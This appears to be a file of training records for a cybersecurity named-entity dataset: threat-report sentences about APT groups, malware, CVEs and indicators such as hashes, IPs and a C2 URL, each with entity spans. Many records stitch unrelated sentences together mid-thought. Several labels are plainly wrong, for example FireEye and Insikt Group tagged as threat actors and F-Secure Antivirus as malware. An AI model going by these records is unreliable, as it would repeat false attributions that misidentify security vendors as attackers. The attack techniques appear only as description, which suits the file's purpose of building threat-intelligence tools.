{"text": "Our security app allows us to transmit this sensitive data encrypted to you , thus increasing the security that you will not suffer any financial loss . These actors perform DNS hijacking through the use of actor-controlled name servers . PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics .", "spans": {"THREAT_ACTOR: actors": [[159, 165]], "TOOL: name servers": [[224, 236]], "THREAT_ACTOR: PROMETHIUM": [[239, 249]], "THREAT_ACTOR: NEODYMIUM": [[311, 320]]}, "info": {"id": "cyberner_stix_train_006890", "source": "cyberner_stix_train"}}
{"text": "Name svchost.exe Size 1062912 MD5 5e70a5c47c6b59dae7faf0f2d62b28b3 SHA1 cdeea936331fcdd8158c876e9d23539f8976c305 SHA256 730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a Compile Time 2015-04-22 10:49:54 .", "spans": {"FILEPATH: svchost.exe": [[5, 16]], "FILEPATH: 5e70a5c47c6b59dae7faf0f2d62b28b3": [[34, 66]], "FILEPATH: cdeea936331fcdd8158c876e9d23539f8976c305": [[72, 112]], "FILEPATH: 730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a": [[120, 184]]}, "info": {"id": "cyberner_stix_train_006891", "source": "cyberner_stix_train"}}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The campaign is believed to be active covertly since fall 2017 .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]]}, "info": {"id": "cyberner_stix_train_006892", "source": "cyberner_stix_train"}}
{"text": "At the forum of the Armbian operating system , a moderator who goes by the name Tkaiser noted that the backdoor code could remotely be exploitable \" if combined with networked services that might allow access to /proc . In 2016 , CTU researchers observed the group using native system . Outlaw : http://www.minpop.com/sk12pack/names.php Command and control . “ Who or what is asdfdfsda@asdf.com ? , ” Biderman asked , after being sent a list of nine email addresses .", "spans": {"SYSTEM: Armbian": [[20, 27]], "ORGANIZATION: CTU": [[230, 233]], "THREAT_ACTOR: Outlaw": [[287, 293]], "URL: http://www.minpop.com/sk12pack/names.php": [[296, 336]], "TOOL: Command and control": [[337, 356]], "ORGANIZATION: asdfdfsda@asdf.com": [[376, 394]], "ORGANIZATION: Biderman": [[401, 409]]}, "info": {"id": "cyberner_stix_train_006893", "source": "cyberner_stix_train"}}
{"text": "This app , dubbed “ TrickMo ” by our team , is designed to bypass second factor and strong authentication pushed to bank customers when they need to authorize a transaction . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East .", "spans": {"MALWARE: TrickMo": [[20, 27]], "VULNERABILITY: CVE-2017-11882": [[203, 217]], "VULNERABILITY: CVE-2018-0802": [[222, 235]], "TOOL: weaponizer": [[242, 252]], "THREAT_ACTOR: actors": [[301, 307]], "ORGANIZATION: Unit 42": [[485, 492]], "THREAT_ACTOR: OilRig group": [[526, 538]], "ORGANIZATION: government agency": [[569, 586]]}, "info": {"id": "cyberner_stix_train_006894", "source": "cyberner_stix_train"}}
{"text": "This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany . WEBC2 backdoors work for their intended purpose , but they generally have fewer features than the “ Standard Backdoors ” described below . Attackers frequently abuse stolen certificates to prevent the malware they 're spreading from being detected by various security protections .", "spans": {"ORGANIZATION: banks": [[178, 183], [250, 255]], "TOOL: banking Trojan": [[200, 214]], "MALWARE: WEBC2 backdoors": [[269, 284]], "THREAT_ACTOR: Attackers": [[408, 417]]}, "info": {"id": "cyberner_stix_train_006895", "source": "cyberner_stix_train"}}
{"text": "credential harvester , Sasfis .", "spans": {"MALWARE: Sasfis": [[23, 29]]}, "info": {"id": "cyberner_stix_train_006896", "source": "cyberner_stix_train"}}
{"text": "] com ws.my-local-weather [ . Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . those in the Palestinian government . If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": {"ORGANIZATION: FireEye": [[85, 92]], "THREAT_ACTOR: TEMP.Veles": [[160, 170]], "TOOL: TRITON": [[218, 224]], "ORGANIZATION: Dragos": [[241, 247]], "THREAT_ACTOR: XENOTIME": [[324, 332]], "ORGANIZATION: Palestinian government": [[348, 370]], "VULNERABILITY: If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions": [[373, 571]]}, "info": {"id": "cyberner_stix_train_006897", "source": "cyberner_stix_train"}}
{"text": "HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . We have already notified Dropbox about the use of its service for this malware .", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[0, 12]], "THREAT_ACTOR: group": [[50, 55]], "ORGANIZATION: aerospace": [[123, 132]], "ORGANIZATION: energy": [[135, 141]], "ORGANIZATION: financial": [[144, 153]], "ORGANIZATION: government": [[156, 166]], "ORGANIZATION: hospitality": [[169, 180]], "ORGANIZATION: telecommunications business": [[185, 212]], "TOOL: Dropbox": [[250, 257]]}, "info": {"id": "cyberner_stix_train_006898", "source": "cyberner_stix_train"}}
{"text": "A mysterious hacker or hackers going by the name \" The Shadow Brokers \" claims to have hacked a group linked to the NSA and dumped a bunch of its hacking tools . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 .", "spans": {"ORGANIZATION: NSA": [[116, 119]], "THREAT_ACTOR: Fxmsp": [[162, 167]]}, "info": {"id": "cyberner_stix_train_006899", "source": "cyberner_stix_train"}}
{"text": "From these distribution sites , we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim .", "spans": {"MALWARE: Trojan": [[156, 162]], "MALWARE: Nymaim": [[169, 175]]}, "info": {"id": "cyberner_stix_train_006900", "source": "cyberner_stix_train"}}
{"text": "The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Microsoft Office products": [[44, 69]], "MALWARE: F-Secure Antivirus": [[182, 200]], "MALWARE: Mofang": [[205, 211]]}, "info": {"id": "cyberner_stix_train_006901", "source": "cyberner_stix_train"}}
{"text": "It could be possible that the espionage actors used his public identity as a diversion to mislead and to hide the real identity of the attackers or it is also possible that this individual was hired to carry out the attack .", "spans": {}, "info": {"id": "cyberner_stix_train_006902", "source": "cyberner_stix_train"}}
{"text": "The key for each file is generated randomly and stored in the encrypted file with a fixed offset . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Among all these random keys once the word “salamati” was also used, which means “health” in Farsi . It appears the activity by the group may have been stopped early in the attack chain as the only malicious activity seen on infected machines is credential harvesting .", "spans": {"THREAT_ACTOR: APT33": [[129, 134]], "ORGANIZATION: organization": [[162, 174]], "ORGANIZATION: business conglomerate": [[194, 215]], "MALWARE: malicious file": [[224, 238]], "ORGANIZATION: petrochemical company": [[311, 332]], "THREAT_ACTOR: group": [[466, 471]], "SYSTEM: infected machines": [[559, 576]]}, "info": {"id": "cyberner_stix_train_006903", "source": "cyberner_stix_train"}}
{"text": "Given the lack of indicators of compromise , we decided to check to see if this was the same malware we had been researching . APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots . According to Gartner , ASUS is the world’s 5th-largest PC vendor by 2017 unit sales . Over the last decade , Iran has waged a number of disruptive and destructive cyber campaigns against government entities and companies alike , becoming infamous for its deployment of wiper malware as well as its retaliatory attack strategy .", "spans": {"THREAT_ACTOR: APT10": [[127, 132]], "TOOL: scheduled tasks": [[188, 203]], "TOOL: Windows services": [[207, 223]], "ORGANIZATION: Gartner": [[314, 321]], "ORGANIZATION: ASUS": [[324, 328]], "THREAT_ACTOR: Iran": [[410, 414]], "ORGANIZATION: government entities": [[488, 507]], "ORGANIZATION: companies": [[512, 521]]}, "info": {"id": "cyberner_stix_train_006904", "source": "cyberner_stix_train"}}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[189, 197]], "MALWARE: checker1.exe": [[198, 210]], "MALWARE: PsExec": [[295, 301]], "MALWARE: psexec.exe": [[322, 332]], "FILEPATH: makeself.sh": [[335, 346]], "FILEPATH: shell script": [[358, 370]]}, "info": {"id": "cyberner_stix_train_006905", "source": "cyberner_stix_train"}}
{"text": "Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"TOOL: emails": [[33, 39]], "TOOL: Winnti installer": [[42, 58]]}, "info": {"id": "cyberner_stix_train_006906", "source": "cyberner_stix_train"}}
{"text": "Trend Micro offers security for Android mobile devices through Mobile Security for Android™ to protect against these types of attacks . This isn't the first time we've seen Cobalt makes this error—back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw . the code was written to link the block comparison variable and block address in MMAT_LOCOPT , But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "SYSTEM: Android": [[32, 39]], "SYSTEM: Mobile Security for Android™": [[63, 91]], "THREAT_ACTOR: Cobalt": [[173, 179]], "ORGANIZATION: financial institutions": [[257, 279]], "TOOL: MMAT_LOCOPT": [[394, 405]], "ORGANIZATION: Hulu": [[443, 447]]}, "info": {"id": "cyberner_stix_train_006907", "source": "cyberner_stix_train"}}
{"text": "The keylogger can track three different events ( Figure 5 ) : TYPE_VIEW_CLICKED Represents the event of clicking on a View-like Button , CompoundButton , etc . The latter was one of at least three law firms Butterfly has targeted over the past three years . As with their previous fake company “ Combi Security ” , we are confident that they continue to create new personas for use in either targeting or recruiting under a “ new ” brand , “ IPC ” . In fact , this chain also leads to NetSupport RAT .", "spans": {"ORGANIZATION: law firms": [[197, 206]], "THREAT_ACTOR: Butterfly": [[207, 216]], "ORGANIZATION: Combi Security": [[296, 310]], "ORGANIZATION: IPC": [[442, 445]], "TOOL: NetSupport RAT": [[485, 499]]}, "info": {"id": "cyberner_stix_train_006908", "source": "cyberner_stix_train"}}
{"text": "HummingWhale , as the professionally developed malware has been dubbed , is a variant of HummingBad , the name given to a family of malicious apps researchers documented in July invading non-Google app markets . The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality . However , prior to this attempted attack , Symantec had rolled out proactive protection against any attempt to exploit this vulnerability ( Exp.CVE-2018-20250 ) . Such non - native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post - intrusion cleanup process .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "MALWARE: HummingBad": [[89, 99]], "TOOL: KiloAlfa": [[226, 234]], "TOOL: keylogging functionality": [[316, 340]], "ORGANIZATION: Symantec": [[386, 394]], "VULNERABILITY: Exp.CVE-2018-20250": [[483, 501]]}, "info": {"id": "cyberner_stix_train_006909", "source": "cyberner_stix_train"}}
{"text": "We further assess that APT28 is the group responsible for the network compromises of WADA and the DNC and other entities related to the 2016 U.S. presidential election cycle .", "spans": {"THREAT_ACTOR: APT28": [[23, 28]], "ORGANIZATION: WADA": [[85, 89]], "ORGANIZATION: DNC": [[98, 101]]}, "info": {"id": "cyberner_stix_train_006910", "source": "cyberner_stix_train"}}
{"text": "The modern version of Rotexy combines the functions of a banking Trojan and ransomware . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal .", "spans": {"MALWARE: Rotexy": [[22, 28]], "THREAT_ACTOR: REDBALDKNIGHT": [[99, 112]], "MALWARE: decoy documents": [[223, 238]], "MALWARE: RATANKBA": [[300, 308]], "THREAT_ACTOR: Lazarus": [[339, 346]]}, "info": {"id": "cyberner_stix_train_006911", "source": "cyberner_stix_train"}}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[121, 172]], "ORGANIZATION: MATI": [[175, 179]], "FILEPATH: Backdoor.Powemuddy": [[215, 233]], "THREAT_ACTOR: Seedworm": [[252, 260]], "FILEPATH: Powermud backdoor": [[264, 281]], "MALWARE: POWERSTATS": [[288, 298]], "VULNERABILITY: exploit": [[425, 432]]}, "info": {"id": "cyberner_stix_train_006912", "source": "cyberner_stix_train"}}
{"text": "Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue .", "spans": {"THREAT_ACTOR: Lazarus group": [[24, 37]], "ORGANIZATION: job recruiters": [[108, 122]], "FILEPATH: TajMahal": [[198, 206]]}, "info": {"id": "cyberner_stix_train_006913", "source": "cyberner_stix_train"}}
{"text": "After enabling AccessibilityService , the malware sets itself as the default SMS app Now installed and having obtained the necessary permissions from the user , Riltok contacts its C & C server . APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009 . The .scr file contains 2 Office documents .", "spans": {"MALWARE: Riltok": [[161, 167]], "THREAT_ACTOR: APT10": [[196, 201]], "THREAT_ACTOR: FireEye": [[242, 249]], "FILEPATH: .scr": [[279, 283]], "TOOL: Office": [[300, 306]]}, "info": {"id": "cyberner_stix_train_006914", "source": "cyberner_stix_train"}}
{"text": "During this stage , the loader may also call a certain API using native system calls , which is another way to bypass breakpoints on API and security solutions using hooks . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound . The steganography algorithm appears to be bespoke and utilizes a least significant bit approach to minimize visual differences when compared with the original image to prevent analysis by discovery tools . \" VP Labs RD and Deputy CSO at LogRhythm .", "spans": {"TOOL: Retriever": [[192, 201]], "TOOL: .NET downloader": [[207, 222]], "ORGANIZATION: VP Labs RD and Deputy CSO at LogRhythm": [[508, 546]]}, "info": {"id": "cyberner_stix_train_006915", "source": "cyberner_stix_train"}}
{"text": "EVENTBOT VERSION 0.0.0.2 Dynamic Library Loading As of Version 0.0.0.2 , EventBot attempts to hide its main functionality from static analysis . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER .", "spans": {"MALWARE: EVENTBOT": [[0, 8]], "MALWARE: EventBot": [[73, 81]], "MALWARE: KHRAT": [[145, 150]], "TOOL: backdoor trojan": [[156, 171]], "THREAT_ACTOR: DragonOK": [[236, 244]], "ORGANIZATION: FireEye": [[262, 269]], "THREAT_ACTOR: APT34": [[279, 284]], "MALWARE: POWRUNER PowerShell-based backdoor": [[340, 374]], "MALWARE: BONDUPDATER": [[394, 405]]}, "info": {"id": "cyberner_stix_train_006916", "source": "cyberner_stix_train"}}
{"text": "Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and using an email theme relevant to the targets .", "spans": {"TOOL: email": [[100, 105], [123, 128]]}, "info": {"id": "cyberner_stix_train_006917", "source": "cyberner_stix_train"}}
{"text": "As of this writing , all the domains were registered recently and some are already offline . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri .", "spans": {"MALWARE: JS dropper": [[136, 146]], "MALWARE: JS decryptor": [[169, 181]], "MALWARE: KopiLuwak": [[261, 270]], "THREAT_ACTOR: Flying Kitten": [[412, 425]], "THREAT_ACTOR: Rocket Kitten": [[429, 442]]}, "info": {"id": "cyberner_stix_train_006918", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 69.87.223.26 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 69.87.223.26": [[11, 23]]}, "info": {"id": "cyberner_stix_train_006919", "source": "cyberner_stix_train"}}
{"text": "First , the app creates a JavaScript function to call a Java method , getImageBase64 , exposed to WebView using addJavascriptInterface . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions – South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) . ZxShell employs a strange method for communication : it hooks the NtWriteFile API and recognizes 5 different special handle values as commands : In this blog post , we show how the newly found Kritec skimmer was found along side one of its competitors .", "spans": {"MALWARE: ZxShell": [[334, 341]], "MALWARE: Kritec skimmer": [[527, 541]]}, "info": {"id": "cyberner_stix_train_006920", "source": "cyberner_stix_train"}}
{"text": "CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2017-0143": [[0, 13]], "MALWARE: tools—EternalRomance": [[49, 69]], "MALWARE: EternalSynergy—that": [[74, 93]], "VULNERABILITY: CVE-2011-3544": [[208, 221]], "MALWARE: HTTPBrowser backdoor": [[289, 309]], "VULNERABILITY: CVE-2010-0738": [[316, 329]], "MALWARE: JBoss": [[351, 356]], "VULNERABILITY: exploit": [[457, 464]]}, "info": {"id": "cyberner_stix_train_006921", "source": "cyberner_stix_train"}}
{"text": "In 2018 , versions of Rotexy emerged that contacted the C & C using its IP address . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 .", "spans": {"MALWARE: Rotexy": [[22, 28]], "THREAT_ACTOR: APT32": [[112, 117]], "MALWARE: Microsoft ActiveMime file": [[159, 184]], "MALWARE: WannaCry": [[227, 235]], "MALWARE: WCry": [[252, 256]], "MALWARE: WanaCryptor": [[260, 271]], "MALWARE: ransomware": [[318, 328]], "ORGANIZATION: Microsoft": [[430, 439]], "TOOL: Server Message Block": [[443, 463]], "TOOL: SMB": [[466, 469]]}, "info": {"id": "cyberner_stix_train_006922", "source": "cyberner_stix_train"}}
{"text": "This list is expected to grow in the future . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . The email below was sent from a personal email account with a subject line of “ New Year Wishes on January 1st ” .", "spans": {"THREAT_ACTOR: Insikt Group": [[46, 58]], "MALWARE: Citrix-hosted": [[157, 170]], "TOOL: email": [[352, 357], [389, 394]]}, "info": {"id": "cyberner_stix_train_006923", "source": "cyberner_stix_train"}}
{"text": "from the Android device and SIM card setForward — currently not implemented , but can be used to hijack the infected device getForward — currently not implemented , but can be used to hijack the infected device hasPkg — check the device whether a specified app is installed or not setRingerMode — set the device ’ s ringer mode setRecEnable — set the device ’ s ringer mode as silent reqState — get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome — The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . The tool is able to grant remote access and full , direct control of the infected machine to the group .", "spans": {"SYSTEM: Android": [[9, 16]], "THREAT_ACTOR: group": [[523, 528]]}, "info": {"id": "cyberner_stix_train_006924", "source": "cyberner_stix_train"}}
{"text": "In the course of further research , we found a number of related samples that point to a long-term development process . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Charming Kitten usually tries to access private email and Facebook accounts , and sometimes establishes a foothold on victim computers as a secondary objective .", "spans": {"THREAT_ACTOR: MuddyWater": [[121, 131]], "THREAT_ACTOR: Charming Kitten": [[251, 266]], "TOOL: email": [[299, 304]], "ORGANIZATION: Facebook": [[309, 317]]}, "info": {"id": "cyberner_stix_train_006925", "source": "cyberner_stix_train"}}
{"text": "However , because of the length of time for which the group has been distributing Dridex , distribution mechanisms trace the state of the art for the last two years of email campaigns with techniques ranging from straight macro documents to a variety of zipped scripts .", "spans": {"MALWARE: Dridex": [[82, 88]], "TOOL: email": [[168, 173]], "TOOL: macro": [[222, 227]], "TOOL: zipped": [[254, 260]]}, "info": {"id": "cyberner_stix_train_006926", "source": "cyberner_stix_train"}}
{"text": "Although they may have started much earlier , the earliest BlackEnergy sample we could attribute to the Quedagh gang is from December 14 , 2010 . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"TOOL: BlackEnergy sample": [[59, 77]], "THREAT_ACTOR: Quedagh gang": [[104, 116]], "THREAT_ACTOR: APT28": [[146, 151]], "ORGANIZATION: rockers": [[168, 175]], "ORGANIZATION: dissidents Pussy Riot": [[180, 201]], "TOOL: emails": [[221, 227]]}, "info": {"id": "cyberner_stix_train_006927", "source": "cyberner_stix_train"}}
{"text": "The Quasar serve does not verify the RAT data , and displays this data in the RAT Server GUI when the RAT is executed and connects to the server .", "spans": {"MALWARE: Quasar": [[4, 10]], "TOOL: RAT": [[37, 40], [78, 81], [102, 105]]}, "info": {"id": "cyberner_stix_train_006928", "source": "cyberner_stix_train"}}
{"text": "Based on this information , Talos assesses with high confidence that the malware is the same and this is , in fact , the Gustuff malware . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves . We believe this to be a very sophisticated supply chain attack , which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"ORGANIZATION: Talos": [[28, 33]], "MALWARE: Gustuff": [[121, 128]], "TOOL: Quasar malware": [[202, 216]], "TOOL: ChChes": [[272, 278]], "TOOL: RedLeaves": [[283, 292]], "THREAT_ACTOR: Monti": [[498, 503]], "ORGANIZATION: Linux platform": [[519, 533]]}, "info": {"id": "cyberner_stix_train_006929", "source": "cyberner_stix_train"}}
{"text": "To ensure you are fully protected against PHAs and other threats , we recommend these 5 basic steps : Install apps only from reputable sources : Install apps from a reputable source , such as Google Play . RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East . This may suggest that the malefactor changed a build configuration rather than the source code itself . Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": {"SYSTEM: Google Play": [[192, 203]], "THREAT_ACTOR: RASPITE": [[206, 213]], "ORGANIZATION: Symantec": [[242, 250]], "THREAT_ACTOR: Leafminer": [[254, 263]], "THREAT_ACTOR: group": [[306, 311]], "SYSTEM: Cisco Secure Web Appliance": [[449, 475]], "SYSTEM: Web Security Appliance": [[487, 509]]}, "info": {"id": "cyberner_stix_train_006930", "source": "cyberner_stix_train"}}
{"text": "DYNAMIC LIBRARY LOADING Once the application has finished the installation process , the malware starts its real malicious activity . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks .", "spans": {"TOOL: China Chopper webshell": [[152, 174]], "THREAT_ACTOR: Emissary Panda": [[235, 249]], "THREAT_ACTOR: Gorgon Group": [[265, 277]]}, "info": {"id": "cyberner_stix_train_006931", "source": "cyberner_stix_train"}}
{"text": "TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR . The macros popped the same “ Document decryption error ” error message—even if macro code remain totally different . Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": {"ORGANIZATION: bank": [[135, 139]], "TOOL: macros": [[182, 188]], "TOOL: macro": [[257, 262]]}, "info": {"id": "cyberner_stix_train_006932", "source": "cyberner_stix_train"}}
{"text": "In this way , when the service runs during boot , the original Windows executable is executed from a different location and it will automatically load and map the malicious DLL inside its address space , instead of using the genuine system library . By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives . Known to load an updated version of Remy backdoor . For operational plans development , the combination of threats , vulnerabilities , and impacts must be evaluated in order to identify important trends and decide where effort should be applied to eliminate or reduce threat capabilities eliminate or reduce vulnerabilities and assess , coordinate , and deconflict all cyberspace operations NIST , 2010 .", "spans": {"SYSTEM: Windows": [[63, 70]], "MALWARE: Remy backdoor": [[446, 459]]}, "info": {"id": "cyberner_stix_train_006933", "source": "cyberner_stix_train"}}
{"text": "Although a number of actors have distributed Dridex , TA505 operates multiple affiliate IDs , including what appears to be the earliest recorded affiliate , botnet ID 125 .", "spans": {"MALWARE: Dridex": [[45, 51]], "THREAT_ACTOR: TA505": [[54, 59]]}, "info": {"id": "cyberner_stix_train_006934", "source": "cyberner_stix_train"}}
{"text": "] website mobilestoreupdate [ . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below： extract.exe Deploys modules from the .cab file into the working Event Cache directory, bitsadmin.exe Fetches files from the C2 server to parse and execute . However , even though the employees work for you they may feel the companys property belongs to them , not the business , and may feel justified in theft .", "spans": {"THREAT_ACTOR: Elfin": [[36, 41]], "THREAT_ACTOR: espionage group": [[42, 57]], "THREAT_ACTOR: APT33": [[64, 69]], "ORGANIZATION: Microsoft": [[283, 292]], "FILEPATH: extract.exe": [[343, 354]], "FILEPATH: .cab": [[380, 384]], "FILEPATH: bitsadmin.exe": [[430, 443]], "TOOL: C2": [[467, 469]]}, "info": {"id": "cyberner_stix_train_006935", "source": "cyberner_stix_train"}}
{"text": "Like many original equipment manufacturers , it uses software components from other developers . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Invader : e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e .", "spans": {"TOOL: Visma network": [[109, 122]], "THREAT_ACTOR: APT10": [[125, 130]], "TOOL: BITSAdmin": [[160, 169]], "MALWARE: Invader": [[330, 337]], "FILEPATH: e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e": [[340, 404]]}, "info": {"id": "cyberner_stix_train_006936", "source": "cyberner_stix_train"}}
{"text": "The Flash object must contact an active C2 server to download an additional Flash object containing exploit code ;", "spans": {"TOOL: Flash": [[4, 9], [76, 81]], "TOOL: C2": [[40, 42]]}, "info": {"id": "cyberner_stix_train_006937", "source": "cyberner_stix_train"}}
{"text": "on Feb 28 , 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise .", "spans": {"THREAT_ACTOR: Ke3chang": [[19, 27]], "VULNERABILITY: Java zero-day vulnerability": [[49, 76]], "VULNERABILITY: CVE-2012-4681": [[79, 92]], "MALWARE: Microsoft Word": [[138, 152]], "VULNERABILITY: CVE-2010-3333": [[155, 168]], "TOOL: Adobe PDF Reader": [[175, 191]], "VULNERABILITY: CVE-2010-2883": [[194, 207]], "ORGANIZATION: telecommunications providers": [[272, 300]], "ORGANIZATION: IT services agencies": [[304, 324]], "THREAT_ACTOR: Seedworm actors": [[351, 366]]}, "info": {"id": "cyberner_stix_train_006938", "source": "cyberner_stix_train"}}
{"text": "Finally , the malware downloads the next stage payload , decrypting it and possibly executing it with the Print parameter .", "spans": {}, "info": {"id": "cyberner_stix_train_006939", "source": "cyberner_stix_train"}}
{"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia .", "spans": {"TOOL: folders": [[4, 11]], "SYSTEM: Windows": [[204, 211]], "ORGANIZATION: government institutions": [[235, 258]]}, "info": {"id": "cyberner_stix_train_006940", "source": "cyberner_stix_train"}}
